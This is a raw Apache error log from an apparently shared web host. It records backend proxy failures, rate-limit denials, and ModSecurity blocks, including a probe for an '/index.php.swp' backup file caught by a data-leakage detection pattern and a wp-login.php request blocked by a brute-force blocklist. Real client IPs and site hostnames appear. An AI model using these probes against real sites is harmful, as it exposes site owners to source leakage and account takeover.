[Tue May 26 19:54:32.979777 2026] [proxy:error] [pid 93576:tid 93735] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979845 2026] [proxy_http:error] [pid 93576:tid 93735] [client 142.248.80.176:25286] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979925 2026] [proxy:error] [pid 93576:tid 93751] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979960 2026] [proxy_http:error] [pid 93576:tid 93751] [client 142.248.80.176:25398] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.980050 2026] [proxy:error] [pid 93576:tid 93766] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.980102 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAeQAAAL8
[Tue May 26 19:54:32.980121 2026] [proxy_http:error] [pid 93576:tid 93766] [client 142.248.80.176:25274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.980457 2026] [proxy:error] [pid 93576:tid 93735] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.980494 2026] [proxy_http:error] [pid 93576:tid 93735] [client 142.248.80.176:25286] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.980589 2026] [proxy:error] [pid 93576:tid 93831] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.980637 2026] [proxy_http:error] [pid 93576:tid 93831] [client 142.248.80.176:25344] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.980798 2026] [proxy:error] [pid 93576:tid 93766] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.980836 2026] [proxy_http:error] [pid 93576:tid 93766] [client 142.248.80.176:25274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.980924 2026] [proxy:error] [pid 93576:tid 93751] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.980962 2026] [proxy_http:error] [pid 93576:tid 93751] [client 142.248.80.176:25398] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.981041 2026] [proxy:error] [pid 93576:tid 93825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.981081 2026] [proxy_http:error] [pid 93576:tid 93825] [client 142.248.80.176:25424] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.981462 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAegAAAQM
[Tue May 26 19:54:32.981679 2026] [proxy:error] [pid 93576:tid 93825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.981730 2026] [proxy_http:error] [pid 93576:tid 93825] [client 142.248.80.176:25424] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.981805 2026] [proxy:error] [pid 93868:tid 94271] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.981880 2026] [proxy_http:error] [pid 93868:tid 94271] [client 142.248.80.176:25216] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.982504 2026] [proxy:error] [pid 93868:tid 94271] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.982571 2026] [proxy_http:error] [pid 93868:tid 94271] [client 142.248.80.176:25216] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.984400 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAewAAAL4
[Tue May 26 19:54:32.985315 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAfAAAAJk
[Tue May 26 19:54:32.987015 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAfgAAAOA
[Tue May 26 19:54:32.987189 2026] [security2:error] [pid 86490:tid 86627] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/index.php.swp"] [unique_id "ahWtIFZMwN0DpLVWo6LAfQAAAIw"]
[Tue May 26 19:54:33.046989 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIUqK9k_ZUB2Vp25JagAAAfc
[Tue May 26 19:54:33.104072 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAfwAAAIc
[Tue May 26 19:54:33.110266 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAgAAAAPk
[Tue May 26 19:54:33.114268 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAgQAAANo
[Tue May 26 19:54:33.126077 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAggAAALw
[Tue May 26 19:54:33.130613 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAgwAAAOw
[Tue May 26 19:54:33.132085 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAhAAAAIo
[Tue May 26 19:54:33.140923 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAhQAAAMQ
[Tue May 26 19:54:33.142491 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAhgAAAOg
[Tue May 26 19:54:33.143605 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAhwAAAL8
[Tue May 26 19:54:33.196895 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIUqK9k_ZUB2Vp25JbQAAAb4
[Tue May 26 19:54:33.254453 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAiwAAAIw
[Tue May 26 19:54:33.268940 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAjQAAAPk
[Tue May 26 19:54:33.277674 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAjwAAAIg
[Tue May 26 19:54:33.278333 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAjgAAANo
[Tue May 26 19:54:33.281578 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_vQAAAPc"]
[Tue May 26 19:54:33.291103 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JQwAAAds"]
[Tue May 26 19:54:33.292908 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JSAAAAcg"]
[Tue May 26 19:54:33.308768 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIVZMwN0DpLVWo6LAlQAAANk
[Tue May 26 19:54:33.319232 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIUqK9k_ZUB2Vp25JcAAAAbo
[Tue May 26 19:54:33.319370 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_sgAAAKo"]
[Tue May 26 19:54:33.321546 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JSgAAAcs"]
[Tue May 26 19:54:33.332531 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JUAAAAeA"]
[Tue May 26 19:54:33.338783 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JTAAAAd8"]
[Tue May 26 19:54:33.347007 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAFAAAAKc"]
[Tue May 26 19:54:33.347829 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_wgAAAMg"]
[Tue May 26 19:54:33.350509 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_wAAAAKQ"]
[Tue May 26 19:54:33.356981 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_1AAAAPw"]
[Tue May 26 19:54:33.360111 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_vwAAALI"]
[Tue May 26 19:54:33.366616 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_2gAAAPs"]
[Tue May 26 19:54:33.367548 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRMQAAAE0"]
[Tue May 26 19:54:33.368248 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JSwAAAfk"]
[Tue May 26 19:54:33.372846 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LADwAAAK0"]
[Tue May 26 19:54:33.373602 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAEwAAAJQ"]
[Tue May 26 19:54:33.377729 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRMgAAAFw"]
[Tue May 26 19:54:33.382928 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LADQAAAJg"]
[Tue May 26 19:54:33.389900 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LADgAAAMw"]
[Tue May 26 19:54:33.394923 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH1ZMwN0DpLVWo6K_1gAAAKk"]
[Tue May 26 19:54:33.418356 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LALgAAAPo"]
[Tue May 26 19:54:33.421426 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRQwAAAF8"]
[Tue May 26 19:54:33.423258 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JWwAAAcw"]
[Tue May 26 19:54:33.431836 2026] [security2:error] [pid 86490:tid 86720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAMAAAAOk"]
[Tue May 26 19:54:33.434541 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LALwAAAMs"]
[Tue May 26 19:54:33.438235 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAJwAAAKY"]
[Tue May 26 19:54:33.471367 2026] [security2:error] [pid 93576:tid 93813] [client 46.8.23.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtIWDRMqfxdEDkoszRcAAAAGU"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1210462&moderation-hash=1f9dfb970fb5f9fcca5e64a4c357da2e
[Tue May 26 19:54:33.539599 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIVZMwN0DpLVWo6LAwwAAAO4
[Tue May 26 19:54:33.547047 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAxAAAANk
[Tue May 26 19:54:33.548739 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAxQAAAMs
[Tue May 26 19:54:33.558878 2026] [security2:error] [pid 93868:tid 94227] [remote 85.215.36.85:33972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JcwABv20"]
[Tue May 26 19:54:33.574078 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAyQAAAKY
[Tue May 26 19:54:33.574300 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAygAAANQ
[Tue May 26 19:54:33.581461 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAywAAAJI
[Tue May 26 19:54:33.584513 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAzAAAAJ4
[Tue May 26 19:54:33.593346 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIWDRMqfxdEDkoszRfQAAAAQ
[Tue May 26 19:54:33.682739 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAzgAAAQQ
[Tue May 26 19:54:33.694685 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIWDRMqfxdEDkoszRfgAAAHw
[Tue May 26 19:54:33.699757 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LAzwAAAPc
[Tue May 26 19:54:33.701149 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA0AAAAN0
[Tue May 26 19:54:33.713964 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA0gAAAIY
[Tue May 26 19:54:33.723371 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA1AAAAMQ
[Tue May 26 19:54:33.731004 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA1QAAAKc
[Tue May 26 19:54:33.732064 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA1gAAANI
[Tue May 26 19:54:33.741008 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA2AAAAP4
[Tue May 26 19:54:33.743599 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIWDRMqfxdEDkoszRfwAAAEA
[Tue May 26 19:54:33.875914 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA3wAAAJI
[Tue May 26 19:54:33.878232 2026] [security2:error] [pid 93576:tid 93712] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtIWDRMqfxdEDkoszRcgAAAAA"]
[Tue May 26 19:54:33.882375 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA4AAAAIc
[Tue May 26 19:54:33.885974 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA4QAAAOA
[Tue May 26 19:54:33.890969 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA4wAAAP8
[Tue May 26 19:54:33.893158 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIWDRMqfxdEDkoszRgQAAABY
[Tue May 26 19:54:33.894553 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA5AAAAJk
[Tue May 26 19:54:33.901969 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA5wAAAPM
[Tue May 26 19:54:33.902615 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA6AAAAPM
